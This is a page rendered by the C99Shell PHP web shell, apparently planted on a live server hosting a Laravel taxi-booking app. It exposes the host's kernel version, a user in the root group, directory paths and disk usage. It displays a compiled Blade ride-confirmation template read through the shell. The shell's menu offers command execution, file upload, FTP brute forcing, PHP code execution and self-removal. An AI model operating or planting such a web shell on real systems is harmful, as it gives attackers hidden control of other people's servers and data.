!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/storage/framework/views/   drwxrwsr-t
Free 28.46 GB of 117.98 GB (24.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     556a2d5e1b79af042132c71103fac752085b323f.php (3.27 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!--Modal-->
<div class="modal opacity-0 pointer-events-none fixed w-full h-full top-0 left-0 flex items-center justify-center">
    <div class="modal-overlay absolute w-full h-full bg-gray-900 opacity-50"></div>

    <div class="modal-container bg-white w-11/12 md:max-w-md mx-auto rounded shadow-lg z-50 overflow-y-auto">

      <div class="modal-close absolute top-10 right-1 cursor-pointer flex flex-col items-center mt-4 mr-4 text-white text-sm z-50">
        <svg class="fill-current text-white" xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18">
          <path d="M14.53 4.53l-1.06-1.06L9 7.94 4.53 3.47 3.47 4.53 7.94 9l-4.47 4.47 1.06 1.06L9 10.06l4.47 4.47 1.06-1.06L10.06 9z"></path>
        </svg>
        <span class="text-sm">(Esc)</span>
      </div>

      <!-- Add margin if you want to see some of the overlay behind the modal-->
      <div class="modal-content py-4 text-left px-6 m-1">
        <!--Title-->
        <div class="flex justify-between items-center pb-3">
          <p class="text-2xl font-bold"><?php echo e(__('taxi.confirmdialog_title')); ?></p>
          <div class="modal-close cursor-pointer z-50">
            <svg class="fill-current text-black" xmlns="http://www.w3.org/2000/svg" width="18" height="18" viewBox="0 0 18 18">
              <path d="M14.53 4.53l-1.06-1.06L9 7.94 4.53 3.47 3.47 4.53 7.94 9l-4.47 4.47 1.06 1.06L9 10.06l4.47 4.47 1.06-1.06L10.06 9z"></path>
            </svg>
          </div>
        </div>

        <!--Body-->
        <p class="pt-4"><?php echo e($start['name']); ?></p>
        <img class="pl-4" style="height: 30px" src="/images/icons/common/down.svg" />
        <p><?php echo e($end['name']); ?></p>

        <p class="pt-5"><span class="opacity-70"><?php echo e(__('Driver')); ?>:</span> <span id="selectedDriverName">XXXXXXXX</span></p>
        <p><span class="opacity-70"><?php echo e(__('At your location in')); ?>:</span> <span id="selectedDriverTime">XXXXXXXX</span></p>
        <p><span class="opacity-70"><?php echo e(__('Estimated cost')); ?>:</span> <span id="selectedDriverCost">XXXXXXXX</span></p>

        <!--Footer-->
        <div class="flex justify-end pt-4 mt-2">
          <button class="modal-close px-4 bg-transparent p-3 rounded-lg text-dark text-green-500 hover:bg-gray-100 hover:text-green-400 mr-2"><?php echo e(__('Close')); ?></button>
          <?php if(config('app.isdrive')): ?>
            <?php if(auth()->guard()->check()): ?>
              <button id="requstRideButton" class="px-4 bg-green-500 p-3 rounded-lg text-dark hover:bg-green-400"><?php echo e(__('taxi.ride_now')); ?></button>
            <?php endif; ?>
            <?php if(auth()->guard()->guest()): ?>
              <a href="<?php echo e(route('login')); ?>" class="px-4 bg-green-500 p-3 rounded-lg text-dark hover:bg-green-400"><?php echo e(__('taxi.login_to_continue')); ?></a>
            <?php endif; ?>
          <?php endif; ?>
          <?php if(config('app.issd')): ?>
            <button id="requstRideButton" class="px-4 bg-green-500 p-3 rounded-lg text-dark hover:bg-green-400"><?php echo e(__('taxi.chat_now')); ?></button>
          <?php endif; ?>


        </div>

      </div>
    </div>
</div>
<?php /**PATH /home/picotech/domains/wataxi.picotech.app/public_html/resources/views/taxilanding/directory/modal.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--